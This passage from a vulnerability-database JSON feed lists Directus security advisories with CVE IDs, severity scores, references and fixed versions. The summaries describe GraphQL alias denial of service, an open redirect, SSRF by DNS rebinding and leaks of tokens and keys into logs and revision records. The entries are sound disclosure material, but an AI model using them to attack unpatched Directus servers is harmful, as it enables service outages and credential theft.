"cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-21T15:28:44Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-8vg2-wf3q-mwv7" }, { "reference_url": "https://github.com/directus/directus/blob/7c479c5161639aac466c763b6b958a9524201d74/api/src/logger.ts#L13", 
"reference_id": "logger.ts#L13", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-21T15:28:44Z/" } ], "url": "https://github.com/directus/directus/blob/7c479c5161639aac466c763b6b958a9524201d74/api/src/logger.ts#L13" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/380863?format=api", "purl": "pkg:npm/directus@9.23.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-45yr-y58u-aqb8" }, { "vulnerability": "VCID-4z1u-rtza-83bj" }, { "vulnerability": "VCID-54ja-4vrx-tbgm" }, { "vulnerability": "VCID-79ch-vtkp-q3cd" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-eyv5-91cq-pyf9" }, { "vulnerability": "VCID-f3pv-2cf5-3bg8" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-gf4m-ad8j-7bbn" }, { "vulnerability": "VCID-jvtg-cnnb-7ubg" }, { "vulnerability": "VCID-jy2x-jbbb-zua5" }, { "vulnerability": "VCID-pvfa-xp3e-8kg2" }, { "vulnerability": "VCID-qeh1-cm33-93g1" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-qrf3-cz1h-8kau" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-s39d-aw92-hydh" }, { "vulnerability": "VCID-snux-8b2e-9kd6" }, { "vulnerability": "VCID-t1by-h5au-rqbu" }, { 
"vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u4er-eddz-g7aq" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ua8h-tmak-hufd" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v2je-s9mk-e3h1" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.23.3" } ], "aliases": [ "CVE-2023-28443", "GHSA-8vg2-wf3q-mwv7" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-b8ya-2bmn-e3h5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/71751?format=api", "vulnerability_id": "VCID-bc42-4j4d-tudj", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.17.0, Directus' GraphQL endpoints (/graphql and /graphql/system) did not deduplicate resolver invocations within a single request. An authenticated user could exploit GraphQL aliasing to repeat an expensive relational query many times in a single request, forcing the server to execute a large number of independent complex database queries concurrently, multiplying database load linearly with the number of aliases. The existing token limit on GraphQL queries still permitted enough aliases for significant resource exhaustion, while the relational depth limit applied per alias without reducing the total number executed. Rate limiting is disabled by default, meaning no built-in throttle prevented this from causing CPU, memory, and I/O exhaustion that could degrade or crash the service. Any authenticated user, including those with minimal read-only permissions, could trigger this condition. 
This vulnerability is fixed in 11.17.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35441", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.02996", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00015", "scoring_system": "epss", "scoring_elements": "0.02984", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04343", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04344", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35441" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35441", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35441" }, { "reference_url": "https://github.com/advisories/GHSA-ph52-67fq-75wj", "reference_id": "GHSA-ph52-67fq-75wj", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-ph52-67fq-75wj" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-ph52-67fq-75wj", "reference_id": "GHSA-ph52-67fq-75wj", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": 
"cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-07T14:47:06Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-ph52-67fq-75wj" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373752?format=api", "purl": "pkg:npm/directus@11.17.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.17.0" } ], "aliases": [ "CVE-2026-35441", "GHSA-ph52-67fq-75wj" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bc42-4j4d-tudj" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/71608?format=api", "vulnerability_id": "VCID-bg96-h5bt-xfbb", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.16.1, Directus is vulnerable to an open redirect via the redirect query parameter on the /admin/tfa-setup page. When an administrator who has not yet configured Two-Factor Authentication (2FA) visits a crafted URL, they are presented with the legitimate Directus 2FA setup page. After completing the setup process, the application redirects the user to the attacker-controlled URL specified in the redirect parameter without any validation. This vulnerability could be used in phishing attacks targeting Directus administrators, as the initial interaction occurs on a trusted domain. 
This vulnerability is fixed in 11.16.1.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35411", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05334", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00019", "scoring_system": "epss", "scoring_elements": "0.05352", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00027", "scoring_system": "epss", "scoring_elements": "0.08275", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00027", "scoring_system": "epss", "scoring_elements": "0.08276", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35411" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35411", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35411" }, { "reference_url": "https://github.com/advisories/GHSA-q75c-4gmv-mg9x", "reference_id": "GHSA-q75c-4gmv-mg9x", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-q75c-4gmv-mg9x" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-q75c-4gmv-mg9x", "reference_id": "GHSA-q75c-4gmv-mg9x", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": 
"cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-07T13:36:55Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-q75c-4gmv-mg9x" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373399?format=api", "purl": "pkg:npm/directus@11.16.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.16.1" } ], "aliases": [ "CVE-2026-35411", "GHSA-q75c-4gmv-mg9x" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bg96-h5bt-xfbb" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/135972?format=api", "vulnerability_id": "VCID-bsua-aktm-1qfd", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to version 9.23.0, Directus is vulnerable to Server-Side Request Forgery (SSRF) when importing a file from a remote web server (POST to `/files/import`). An authenticated user who is allowed to import files can bypass the existing host validation by performing a DNS rebinding attack: the supplied hostname resolves to a permitted address while the request is being checked and to an internal address when the file is actually fetched. The attacker can then read responses from internal services or use the endpoint to port-scan the server's local network. 
This issue was fixed in version 9.23.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2023-26492", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0023", "scoring_system": "epss", "scoring_elements": "0.46047", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.0023", "scoring_system": "epss", "scoring_elements": "0.46033", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.0023", "scoring_system": "epss", "scoring_elements": "0.45895", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.0023", "scoring_system": "epss", "scoring_elements": "0.4604", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2023-26492" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26492", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26492" }, { "reference_url": "https://github.com/directus/directus/commit/ff53d3e69a602d05342e15d9bb616884833ddbff", "reference_id": "ff53d3e69a602d05342e15d9bb616884833ddbff", "reference_type": "", "scores": [ { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", 
"scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:38Z/" } ], "url": "https://github.com/directus/directus/commit/ff53d3e69a602d05342e15d9bb616884833ddbff" }, { "reference_url": "https://github.com/advisories/GHSA-j3rg-3rgm-537h", "reference_id": "GHSA-j3rg-3rgm-537h", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-j3rg-3rgm-537h" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-j3rg-3rgm-537h", "reference_id": "GHSA-j3rg-3rgm-537h", "reference_type": "", "scores": [ { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:38Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-j3rg-3rgm-537h" }, { "reference_url": "https://github.com/directus/directus/releases/tag/v9.23.0", "reference_id": "v9.23.0", "reference_type": "", "scores": [ { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:38Z/" } ], "url": "https://github.com/directus/directus/releases/tag/v9.23.0" } ], 
"fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/32456?format=api", "purl": "pkg:npm/directus@9.23.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-f3pv-2cf5-3bg8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.23.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/393033?format=api", "purl": "pkg:npm/directus@9.23.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-45yr-y58u-aqb8" }, { "vulnerability": "VCID-4z1u-rtza-83bj" }, { "vulnerability": "VCID-54ja-4vrx-tbgm" }, { "vulnerability": "VCID-79ch-vtkp-q3cd" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-b8ya-2bmn-e3h5" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-eyv5-91cq-pyf9" }, { "vulnerability": "VCID-f3pv-2cf5-3bg8" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-gf4m-ad8j-7bbn" }, { "vulnerability": "VCID-jvtg-cnnb-7ubg" }, { "vulnerability": "VCID-jy2x-jbbb-zua5" }, { "vulnerability": "VCID-pvfa-xp3e-8kg2" }, { "vulnerability": "VCID-qeh1-cm33-93g1" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-qrf3-cz1h-8kau" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-s39d-aw92-hydh" }, { "vulnerability": "VCID-snux-8b2e-9kd6" }, { "vulnerability": "VCID-t1by-h5au-rqbu" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u4er-eddz-g7aq" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ua8h-tmak-hufd" }, { 
"vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v2je-s9mk-e3h1" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.23.1" } ], "aliases": [ "CVE-2023-26492", "GHSA-j3rg-3rgm-537h" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bsua-aktm-1qfd" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/105701?format=api", "vulnerability_id": "VCID-c4eu-udp3-uuen", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Starting in version 9.0.0 and prior to version 11.9.0, when using Directus Flows to handle CRUD events for users it is possible to log the incoming data to console using the \"Log to Console\" operation and a template string. Malicious admins can log sensitive data from other users when they are created or updated. Version 11.9.0 contains a fix for the issue. 
As a workaround, avoid logging sensitive data to the console outside the context of development.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-53885", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00109", "scoring_system": "epss", "scoring_elements": "0.28985", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00109", "scoring_system": "epss", "scoring_elements": "0.28979", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00109", "scoring_system": "epss", "scoring_elements": "0.28999", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00109", "scoring_system": "epss", "scoring_elements": "0.28778", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-53885" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53885", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-53885" }, { "reference_url": "https://github.com/directus/directus/pull/25355", "reference_id": "25355", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": 
"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:43:27Z/" } ], "url": "https://github.com/directus/directus/pull/25355" }, { "reference_url": "https://github.com/directus/directus/commit/859f664f56fb50401c407b095889cea38ff580e5", "reference_id": "859f664f56fb50401c407b095889cea38ff580e5", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:43:27Z/" } ], "url": "https://github.com/directus/directus/commit/859f664f56fb50401c407b095889cea38ff580e5" }, { "reference_url": "https://github.com/advisories/GHSA-x3vm-88hf-gpxp", "reference_id": "GHSA-x3vm-88hf-gpxp", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-x3vm-88hf-gpxp" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-x3vm-88hf-gpxp", "reference_id": "GHSA-x3vm-88hf-gpxp", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:43:27Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-x3vm-88hf-gpxp" }, { "reference_url": "https://github.com/directus/directus/releases/tag/v11.9.0", "reference_id": "v11.9.0", "reference_type": "", "scores": [ { "value": "4.2", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N" }, { "value": 
"MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:43:27Z/" } ], "url": "https://github.com/directus/directus/releases/tag/v11.9.0" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/378353?format=api", "purl": "pkg:npm/directus@11.9.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-8q3p-rrv2-jba5" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.9.0" } ], "aliases": [ "CVE-2025-53885", "GHSA-x3vm-88hf-gpxp" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-c4eu-udp3-uuen" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/72964?format=api", "vulnerability_id": "VCID-d8vm-nuff-uffc", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.17.0, Directus stores revision records (in directus_revisions) whenever items are created or updated. 
Because the revision snapshot code did not consistently run the prepareDelta sanitization pipeline, sensitive fields (including user tokens, two-factor authentication secrets, external auth identifiers, auth data, stored credentials, and AI provider API keys) could be stored in plaintext within revision records, where any account permitted to read directus_revisions could recover them. Upgrading prevents further leakage; whether already-written revision rows are cleaned up is not stated here, so operators should inspect existing revisions and rotate any tokens or keys found in them. This vulnerability is fixed in 11.17.0.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39943", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00032", "scoring_system": "epss", "scoring_elements": "0.09802", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00032", "scoring_system": "epss", "scoring_elements": "0.09788", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00032", "scoring_system": "epss", "scoring_elements": "0.0975", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00032", "scoring_system": "epss", "scoring_elements": "0.098", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-39943" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39943", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39943" }, { "reference_url": "https://github.com/advisories/GHSA-mvv8-v4jj-g47j", "reference_id": "GHSA-mvv8-v4jj-g47j", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": 
"cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-mvv8-v4jj-g47j" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-mvv8-v4jj-g47j", "reference_id": "GHSA-mvv8-v4jj-g47j", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T14:06:00Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-mvv8-v4jj-g47j" }, { "reference_url": "https://github.com/directus/directus/releases/tag/v11.17.0", "reference_id": "v11.17.0", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T14:06:00Z/" } ], "url": "https://github.com/directus/directus/releases/tag/v11.17.0" } ], "fixed_packages": [ { "url": 